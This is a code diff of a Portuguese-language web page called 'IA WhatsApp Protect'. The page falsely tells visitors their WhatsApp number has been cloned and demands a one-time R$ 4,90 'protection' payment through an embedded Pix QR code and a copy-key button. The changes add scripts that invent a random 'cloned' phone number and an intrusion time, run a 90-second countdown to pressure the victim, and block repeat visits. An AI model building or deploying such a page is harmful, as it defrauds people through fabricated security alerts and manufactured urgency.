--- a/index.html
+++ b/index.html
@@ -1,109 +1,111 @@
 <!DOCTYPE html>
 <html lang="pt-BR">
 <head>
-  <meta charset="UTF-8" />
-  <meta name="viewport" content="width=device-width, initial-scale=1" />
+  <meta charset="UTF-8">
   <title>IA WhatsApp Protect</title>
+  <meta name="viewport" content="width=device-width, initial-scale=1">
   <style>
     body {
       font-family: Arial, sans-serif;
       background: #fff;
       color: #000;
       text-align: center;
-      padding: 40px 20px;
+      padding: 30px 20px;
     }
-
-    .logo {
-      color: #25D366;
-      font-weight: bold;
-      font-size: 24px;
-    }
-
-    .title {
-      font-size: 22px;
-      margin-top: 10px;
-      font-weight: bold;
-    }
-
-    .alerta {
-      color: red;
-      font-weight: bold;
-      margin-top: 20px;
-    }
-
-    .info {
-      font-size: 17px;
-      margin-top: 10px;
-      line-height: 1.5;
-    }
-
-    .negrito {
-      font-weight: bold;
-    }
-
+    .logo { color: #25D366; font-size: 24px; font-weight: bold; }
+    .title { font-size: 20px; font-weight: bold; margin-top: 8px; }
+    .alerta { color: red; font-weight: bold; margin: 20px 0 10px; }
+    .info { font-size: 16px; margin-top: 8px; line-height: 1.5; }
+    .qr-code { width: 220px; margin: 20px auto; display: block; }
     .pix-btn {
       background-color: #25D366;
-      color: white;
+      color: #fff;
+      padding: 12px 20px;
       border: none;
-      padding: 15px 25px;
-      font-size: 18px;
-      cursor: pointer;
+      font-size: 16px;
       border-radius: 5px;
       margin-top: 15px;
+      cursor: pointer;
     }
-
-    .contador {
-      color: orange;
-      font-size: 15px;
-      margin-top: 20px;
-    }
-
-    img.qr-code {
-      width: 220px;
-      margin: 20px auto;
-      display: block;
-    }
+    .copiado { color: green; font-size: 14px; margin-top: 8px; }
+    .contador { color: orange; font-size: 15px; margin-top: 18px; }
+    .bloqueado { color: red; font-weight: bold; margin-top: 30px; font-size: 18px; }
   </style>
 </head>
 <body>
-  <div class="logo">🔒 IA WhatsApp Protect</div>
-  <div class="title">Escudo de segurança ativado</div>
 
-  <div class="alerta">⚠️ Atividade suspeita em seu <b>WhatsApp</b> detectada</div>
+  <div id="bloqueio"></div>
 
-  <div class="info">
-    Seu número pode estar vinculado a outro aparelho: <b>+55 11 9XXX-26XX</b><br />
-    Localização suspeita: <b>São Paulo – 03:12h</b><br /><br />
-    O sistema ativou automaticamente o protocolo <span class="negrito">IA WhatsApp Protect</span>, com escaneamento de ameaças em tempo real.<br /><br />
-    <span class="negrito">Tecnologia baseada em Inteligência Artificial</span><br /><br />
-    Valor único de proteção: <span class="negrito" style="color:red;">R$ 4,90</span><br />
-    (<i>IA WhatsApp Protect opera globalmente por menos de $1 USD</i>)<br /><br />
-    <span class="negrito" style="color:green;">Faça a validação da proteção agora</span>
+  <div id="conteudo">
+
+    <div class="logo">🔒 IA WhatsApp Protect</div>
+    <div class="title">Escudo de segurança ativado</div>
+
+    <div class="alerta">⚠️ Atividade suspeita detectada</div>
+
+    <div class="info">
+      Número potencialmente clonado: <b id="numero"></b><br>
+      Localização: <b>São Paulo – <span id="hora"></span></b><br><br>
+      Sistema ativado automaticamente com varredura por IA.<br>
+      <b>Proteção única: R$ 4,90</b><br>
+      <span style="color:green;">Faça a validação da proteção agora</span>
+    </div>
+
+    <img class="qr-code" src="https://api.qrserver.com/v1/create-qr-code/?size=220x220&data=00020101021226850014br.gov.bcb.pix2563pix.santander.com.br/qr/v2/14e57911-d312-47bd-ac6d-0ae819a3772c52040000530398654044.905802BR5923SUL%20INTERMEDIACOES%20LTDA6009SAO%20PAULO62070503***6304BAAB" alt="QR Code">
+
+    <button class="pix-btn" onclick="copiarPix()">Copiar Chave Pix</button>
+    <div id="copiado" class="copiado" style="display:none;">✔ Chave Pix copiada</div>
+
+    <div class="contador" id="timer">⏳ Sua autenticação expira em 90 segundos.</div>
+
   </div>
 
-  <!-- QR gerado automaticamente -->
-  <img
-    class="qr-code"
-    src="https://api.qrserver.com/v1/create-qr-code/?size=220x220&data=00020101021226850014br.gov.bcb.pix2563pix.santander.com.br/qr/v2/14e57911-d312-47bd-ac6d-0ae819a3772c52040000530398654044.905802BR5923SUL%20INTERMEDIACOES%20LTDA6009SAO%20PAULO62070503***6304BAAB"
-    alt="QR Code de Pagamento" />
-
-  <button class="pix-btn">Copiar Chave Pix</button>
-
-  <div class="contador" id="timer">⏳ Sua autenticação expira em 90 segundos.</div>
-
   <script>
+    // BLOQUEIO de retorno
+    if (localStorage.getItem("acesso") === "bloqueado") {
+      document.getElementById("conteudo").style.display = "none";
+      document.getElementById("bloqueio").innerHTML =
+        "<div class='bloqueado'>⚠️ Este acesso já foi autenticado.<br>Transação única por dispositivo.</div>";
+    } else {
+      localStorage.setItem("acesso", "bloqueado");
+    }
+
+    // Número aleatório
+    function gerarNumero() {
+      const final1 = Math.floor(Math.random() * 90 + 10);
+      const final2 = Math.floor(Math.random() * 90 + 10);
+      return `+55 11 9${Math.floor(1000 + Math.random()*9000)}-${final1}${final2}`;
+    }
+    document.getElementById("numero").innerText = gerarNumero();
+
+    // Hora aleatória
+    function gerarHora() {
+      const h = String(Math.floor(Math.random() * 5) + 1).padStart(2, '0');
+      const m = String(Math.floor(Math.random() * 60)).padStart(2, '0');
+      return `${h}:${m}h`;
+    }
+    document.getElementById("hora").innerText = gerarHora();
+
+    // Timer regressivo
     let segundos = 90;
     const timer = document.getElementById("timer");
     const intervalo = setInterval(() => {
       segundos--;
-      timer.textContent = `⏳ Sua autenticação expira em ${segundos} segundos.`;
+      timer.innerText = `⏳ Sua autenticação expira em ${segundos} segundos.`;
       if (segundos <= 0) {
         clearInterval(intervalo);
-        timer.textContent = "⚠️ Autenticação expirada. Atualize para tentar novamente.";
+        timer.innerText = "⚠️ Tempo expirado. Tente novamente.";
         timer.style.color = "red";
       }
     }, 1000);
+
+    // Copiar Pix
+    function copiarPix() {
+      const chave = `00020101021226850014br.gov.bcb.pix2563pix.santander.com.br/qr/v2/14e57911-d312-47bd-ac6d-0ae819a3772c52040000530398654044.905802BR5923SUL INTERMEDIACOES LTDA6009SAO PAULO62070503***6304BAAB`;
+      navigator.clipboard.writeText(chave).then(() => {
+        document.getElementById("copiado").style.display = "block";
+      });
+    }
   </script>
 </body>
 </html>
-
